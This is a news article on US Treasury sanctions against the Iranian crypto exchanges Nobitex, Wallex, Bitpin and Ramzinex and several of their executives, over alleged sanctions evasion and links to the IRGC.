According to Treasury data, Nobitex processed more than 50% of all Iranian digital assets inflows during 2025, whereas Wallex and Bitpin handled approximately 12% and 10%, respectively. Since its establishment in 2018, Ramzinex has facilitated more than $2.45 billion in cumulative transactions, making it one of the nation's longest-running platforms. The figures illustrate why US policymakers have focused on the enforcement of sanctions on virtual asset service providers in recent years. Increasingly, digital asset networks have emerged as alternatives to conventional financial controls for moving capital, settling transactions, and maintaining access to global liquidity.

Iranian financial institutions are largely excluded from international banking mechanisms, including SWIFT. It has been argued that these platforms have served as critical entry and exit points connecting domestic actors to international cryptocurrency markets, creating pathways through which sanctions may be evaded and funds may be transferred across borders. 

OFAC has announced the latest measures as part of a larger campaign that has already frozen approximately half a billion dollars of cryptocurrency connected to the Iranian regime. A strategic move by Washington to target the country's largest exchanges and associated infrastructure is intended to disrupt the digital financial channels through which sanctioned entities can convert, transfer, store, and repatriate value through the cryptocurrency ecosystem, extending the reach of traditional sanctions into a decentralized financial world. 

The Treasury's latest action, which builds on these allegations, targeted not just a single exchange, but what it describes as a broader cryptocurrency infrastructure network underpinning Iran's access to global digital asset markets. In addition to Nobitex, sanctions were also imposed on Iranian exchanges Wallex, Bitpin, and Ramzinex, as well as several senior executives and Nobitex founders.

Washington identified Amir Hossein Rad, the company's chairman and co-founder, as a key figure within the platform's leadership structure. The Treasury contends that Nobitex's significance extends beyond its market share, alleging that the exchange was a critical financial gateway for state-linked entities, facilitating transactions associated with sanctions evasion, IRGC-related activities, ransomware activity, and the movement of assets controlled by the government. The department also claimed that the platform enabled the Central Bank of Iran to access stablecoins worth hundreds of millions of dollars at a time when authorities were seeking a means of supporting the weakening rial and maintaining access to international liquidity outside traditional banking channels. 

As outlined by the Treasury Department, the exchange also facilitated access to overseas cryptocurrency platforms for Iranian officials, individuals with political connections, and affiliated entities despite decades of financial restrictions. Furthermore, US authorities claimed that, following the onset of American military operations involving Iran, Nobitex provided transfers of government assets and safeguarded them during periods of domestic internet disruption, demonstrating the growing strategic significance of digital asset networks during geopolitical crises. 

Among those sanctioned in the package were co-founders Mohammad Ali Aghamir and Mohammad Aghamir, who heads the blockchain division of the company; the Treasury asserted that both maintain close ties to influential Islamic circles. The company's chief executive officer, Seyed Ali Khoei, was also designated as a sanctioned individual due to his significant leadership role. 

Aside from Nobitex, Washington identified Wallex as the second largest cryptocurrency exchange by trading volume in Iran, alleging that it accounted for approximately 12 percent of the country's digital asset inflows in 2025 as well as facilitating transactions related to the IRGC. The Treasury officials indicated that Bitpin processed approximately 10 percent of Iranian digital asset inflows during that same period, and some investors involved in efforts to circumvent US sanctions were allegedly involved. 

In contrast, Ramzinex has been accused of processing transactions worth more than $2.45 billion since its inception in 2018 as well as participating in transactions involving entities associated with the Iranian government and the Islamic Revolutionary Guard Corps. Washington intends to target not only individual actors, but also the digital financial infrastructure that Tehran believes allows it to access, transfer, and repatriate funds beyond conventional sanctions enforcement mechanisms in an effort to combat this threat. 

Cryptocurrencies are becoming a critical frontier in modern financial security as geopolitical conflict, sanctions enforcement, cybercrime, and digital finance increasingly intersect. In an era when regulators are increasingly paying attention to virtual asset ecosystems beyond traditional banking networks, exchanges and financial service providers are facing increased scrutiny over compliance controls, transaction monitoring, and exposure to jurisdictions with high risk.

For cybersecurity and financial security professionals, this development underscores that digital asset infrastructure is viewed not solely as a technological innovation but also as a strategic component of national security, which makes transparency, risk management, and threat intelligence more critical than ever in an increasingly interconnected financial environment.